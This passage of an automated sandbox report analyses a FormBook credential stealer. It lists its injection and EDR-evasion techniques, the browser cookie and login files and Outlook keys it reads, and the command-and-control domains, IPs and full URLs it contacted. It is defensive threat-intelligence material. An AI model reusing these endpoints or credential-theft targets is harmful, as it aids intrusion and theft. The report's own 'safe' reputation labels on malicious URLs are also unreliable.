                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB0BCB mov eax, dword ptr fs:[00000030h]6_2_00FB0BCB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00FB0BCB mov eax, dword ptr fs:[00000030h]6_2_00FB0BCB
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90BCD mov eax, dword ptr fs:[00000030h]6_2_00F90BCD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeCode function: 6_2_00F90BCD mov eax, dword ptr fs:[00000030h]6_2_00F90BCD
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtWriteVirtualMemory: Direct from: 0x77762E3CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtMapViewOfSection: Direct from: 0x77762D1CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtNotifyChangeKey: Direct from: 0x77763C2CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateMutant: Direct from: 0x777635CCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtResumeThread: Direct from: 0x777636ACJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtProtectVirtualMemory: Direct from: 0x77757B2EJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQuerySystemInformation: Direct from: 0x77762DFCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x77762BFCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtReadFile: Direct from: 0x77762ADCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtDelayExecution: Direct from: 0x77762DDCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtWriteVirtualMemory: Direct from: 0x7776490CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryInformationProcess: Direct from: 0x77762C26Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtResumeThread: Direct from: 0x77762FBCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateUserProcess: Direct from: 0x7776371CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtSetInformationThread: Direct from: 0x777563F9Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x77763C9CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtSetInformationThread: Direct from: 0x77762B4CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryAttributesFile: Direct from: 0x77762E6CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtReadVirtualMemory: Direct from: 0x77762E8CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateKey: Direct from: 0x77762C6CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQuerySystemInformation: Direct from: 0x777648CCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x777648ECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryVolumeInformationFile: Direct from: 0x77762F2CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtOpenSection: Direct from: 0x77762E0CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtDeviceIoControlFile: Direct from: 0x77762AECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtAllocateVirtualMemory: Direct from: 0x77762BECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtQueryInformationToken: Direct from: 0x77762CACJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtTerminateThread: Direct from: 0x77762FCCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtCreateFile: Direct from: 0x77762FECJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtOpenFile: Direct from: 0x77762DCCJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtOpenKeyEx: Direct from: 0x77762B9CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtSetInformationProcess: Direct from: 0x77762C5CJump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeNtProtectVirtualMemory: Direct from: 0x77762F9CJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeMemory written: C:\Users\user\Desktop\PGK60fNNCZ.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: NULL target: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeSection loaded: NULL target: C:\Windows\SysWOW64\cacls.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread register set: target process: 5992Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\cacls.exeThread APC queued: target process: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeProcess created: C:\Users\user\Desktop\PGK60fNNCZ.exe "C:\Users\user\Desktop\PGK60fNNCZ.exe"Jump to behavior
                Source: C:\Program Files (x86)\orkXIyPMvMVTGDZibPxdIEvOldoTRyQixDJqPfxG\QxPduTOtZWkp.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                Source: QxPduTOtZWkp.exe, 00000008.00000000.1788160602.0000000001241000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 00000008.00000002.2550886638.0000000001240000.00000002.00000001.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2551757333.0000000001360000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Users\user\Desktop\PGK60fNNCZ.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\PGK60fNNCZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.PGK60fNNCZ.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000009.00000002.2548596334.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1864882444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549473892.0000000003110000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2550953930.0000000000ED0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1866845712.00000000012B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2549241297.0000000003080000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2551691593.00000000028C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1867011916.0000000001460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                Services File Permissions Weakness                		412
                Process Injection                		1
                Masquerading                		1
                OS Credential Dumping                		121
                Security Software Discovery                		Remote Services1
                Email Collection                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		LSASS Memory2
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		3
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Services File Permissions Weakness                		41
                Virtualization/Sandbox Evasion                		Security Account Manager41
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares1
                Data from Local System                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		412
                Process Injection                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information                		LSA Secrets2
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials113
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Services File Permissions Weakness                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                Software Packing                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                DLL Side-Loading                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1588678 Sample: PGK60fNNCZ.exe Startdate: 11/01/2025 Architecture: WINDOWS Score: 100 35 www.aktmarket.xyz 2->35 37 www.golivenow.live 2->37 39 5 other IPs or domains 2->39 47 Suricata IDS alerts for network traffic 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 Yara detected FormBook 2->51 55 3 other signatures 2->55 10 PGK60fNNCZ.exe 3 2->10         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\AppData\...\PGK60fNNCZ.exe.log, ASCII 10->33 dropped 67 Injects a PE file into a foreign processes 10->67 14 PGK60fNNCZ.exe 10->14         started        17 PGK60fNNCZ.exe 10->17         started        19 PGK60fNNCZ.exe 10->19         started        signatures6 process7 signatures8 71 Maps a DLL or memory area into another process 14->71 21 QxPduTOtZWkp.exe 14->21 injected process9 signatures10 57 Found direct / indirect Syscall (likely to bypass EDR) 21->57 24 cacls.exe 13 21->24         started        process11 signatures12 59 Tries to steal Mail credentials (via file / registry access) 24->59 61 Tries to harvest and steal browser information (history, passwords, etc) 24->61 63 Modifies the context of a thread in another process (thread injection) 24->63 65 3 other signatures 24->65 27 QxPduTOtZWkp.exe 24->27 injected 31 firefox.exe 24->31         started        process13 dnsIp14 41 techmiseajour.net 84.32.84.32, 51321, 51322, 51323 NTT-LT-ASLT Lithuania 27->41 43 www.golivenow.live 66.29.149.46, 51329, 51330, 51331 ADVANTAGECOMUS United States 27->43 45 2 other IPs or domains 27->45 69 Found direct / indirect Syscall (likely to bypass EDR) 27->69 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                PGK60fNNCZ.exe68%ReversingLabsWin32.Backdoor.FormBook
                PGK60fNNCZ.exe79%VirustotalBrowse
                PGK60fNNCZ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.techmiseajour.net/jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy40%Avira URL Cloudsafe
                http://www.christinascuties.net/raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy40%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/0%Avira URL Cloudsafe
                http://www.golivenow.live0%Avira URL Cloudsafe
                http://www.techmiseajour.net/jytl/0%Avira URL Cloudsafe
                http://www.golivenow.live/r2k9/0%Avira URL Cloudsafe
                http://www.aktmarket.xyz/wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT00%Avira URL Cloudsafe

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.aktmarket.xyz
                		13.248.169.48
                		truefalse
                  		high
                  iglpg.online
                  		3.33.130.190
                  		truefalse
                    		unknown
                    www.christinascuties.net
                    		74.208.236.156
                    		truefalse
                      		high
                      techmiseajour.net
                      		84.32.84.32
                      		truetrue
                        		unknown
                        www.golivenow.live
                        		66.29.149.46
                        		truetrue
                          		unknown
                          www.techmiseajour.net
                          		unknown
                          		unknownfalse
                            		unknown
                            www.iglpg.online
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.golivenow.live/r2k9/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.techmiseajour.net/jytl/?-pztsZ6x=g6hM5OfAy0aZTOdzxy+YHDeawhxh9ZVnbH1D7PSRWxwlxqBVZ/VTfAfjReyEGXu+lurHf7fRU8SuqLFFtve4HtQbsAC9MkV/G3NnAml8OZJy5NH6433LttETR9jiekKwjvXYHWThJEDI&jHc=_xZhxrExRJpXy4true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.techmiseajour.net/jytl/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aktmarket.xyz/wb7v/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.christinascuties.net/raea/?-pztsZ6x=PqKj/8KuIq0WSNkJd9VnweLoPwEm47E1M43YI/iJd5qBB0feLv8ZTXGbO6iF0HlQbmuDykhZpdeI6maFWjpp3E/jI7y5iYAByXvyTWq6cDZMSDvdA4QMsGyTH+1ZevuClMSDErjQvhDp&jHc=_xZhxrExRJpXy4true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.aktmarket.xyz/wb7v/?jHc=_xZhxrExRJpXy4&-pztsZ6x=IA0aHAKfw1DI7BcY57/RaCO2pXyAG0bIJhioZgrDgtprV+dFeA51d24/BswRkzzY9dVkqa6lP7qo/SE9ZBwNMegpUt1fue+iLHYlvG76twMotNjNvt0StR0O0bh5nOABYSyZ3tCxaOT0true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabcacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://codepen.io/uzcho_/pens/popular/?grid_type=listcacls.exe, 00000009.00000002.2554684215.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2552511952.000000000358A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      		high
                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icocacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://codepen.io/uzcho_/pen/eYdmdXw.csscacls.exe, 00000009.00000002.2554684215.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QxPduTOtZWkp.exe, 0000000C.00000002.2552511952.000000000358A000.00000004.00000001.00040000.00000000.sdmpfalse
                                          		high
                                          http://www.elderscrolls.com/skyrim/playerPGK60fNNCZ.exefalse
                                            		high
                                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.elderscrolls.com/skyrim/characterTPGK60fNNCZ.exefalse
                                                    		high
                                                    https://www.ecosia.org/newtab/cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cacls.exe, 00000009.00000003.2053384004.0000000008158000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://www.elderscrolls.com/skyrim/characterKPGK60fNNCZ.exefalse
                                                          		high
                                                          http://www.golivenow.liveQxPduTOtZWkp.exe, 0000000C.00000002.2550953930.0000000000F25000.00000040.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          13.248.169.48
                                                          		www.aktmarket.xyzUnited States
                                                          		16509AMAZON-02USfalse
                                                          84.32.84.32
                                                          		techmiseajour.netLithuania
                                                          		33922NTT-LT-ASLTtrue
                                                          66.29.149.46
                                                          		www.golivenow.liveUnited States
                                                          		19538ADVANTAGECOMUStrue
                                                          74.208.236.156
                                                          		www.christinascuties.netUnited States
                                                          		8560ONEANDONE-ASBrauerstrasse48DEfalse

                                                          General Information

                                                          Joe Sandbox version:42.0.0 Malachite
                                                          Analysis ID:1588678
                                                          Start date and time:2025-01-11 04:04:19 +01:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 8m 7s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
